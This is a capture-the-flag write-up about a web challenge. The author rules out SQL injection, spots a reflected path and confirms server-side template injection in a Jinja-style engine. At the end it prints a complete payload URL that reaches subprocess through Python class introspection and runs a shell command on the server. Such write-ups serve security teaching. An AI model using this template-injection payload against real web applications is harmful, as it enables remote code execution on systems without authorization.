https://s3-us-west-2.amazonaws.com/secure.notion-static.com/4a7fa8e6-4362-4899-9663-c9effd4b2d62/Untitled.png

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/11ee55b6-fb01-4e71-844d-06f118d38ad1/Untitled.png

The chall is shown above...

At the first glance, it looks like a SQL injection? PS: a lot of people were indeed using sqlmap and it caused the chall unavailble.... Despite the rule clearly said there was no need to use enerumation/autoexploit tools .

So i was tampering with the user and password form. and for whatever I put in the User Password field, the response are always the same.

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/8db80829-4fed-496d-8437-ef036a2ecdae/Untitled.png

So, I was bit confused as this I thought at first was indeed a SQL injection, but if took a look at the source code of how my request was sent

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/f59eb1cb-505a-4f1d-ab51-4fe9ebaa71de/Untitled.png

It is just sending a post request with my input username,password to the /login ?

Hmmmmm, So I was trying to find other interesting/well-known like robots.txt ,

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/e0e0c61c-b1bd-443e-a22f-fddfaf214a9f/Untitled.png

Now, here comes the interesting part! The response page simply reflected the filename of the file that we requested on the html page? This instantly rings a bell for me for SSTI.

Essentially, the website is Rendered using a template framwork such as Jinja. Twig, etc....

And the rest is history....

swisskyrepo/PayloadsAllTheThings

A quick spoof of {{7*7}} showed that the engine that was using to render HTML page was Python-Syntax expression.

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/05ecd014-d804-4c10-9699-31118bfa4d6a/Untitled.png

So, let's find how we can achieve RCE via jinja/python modules.

http://dctf1-chall-injection.westeurope.azurecontainer.io:8080/{{''.__class__.mro()[1].__subclasses__()[-64]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}